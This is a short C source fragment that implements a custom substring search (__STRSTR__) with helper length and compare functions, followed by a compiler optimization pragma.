char * __STRSTR__(char *in,char *str)
{
	char c;
	size_t len;

	c = *str++;
	if (!c)
		return (char *)in;	// Trivial empty string case

	len = __LSTRLEN(str);
	do {
		char sc;

		do {
			sc = *in++;
			if (!sc)
				return (char *)0;
		} while (sc != c);
	} while (__STRNCMP__(in, str, len) != 0);

	return (char *)(in - 1);
}

#pragma optimize("", on) 

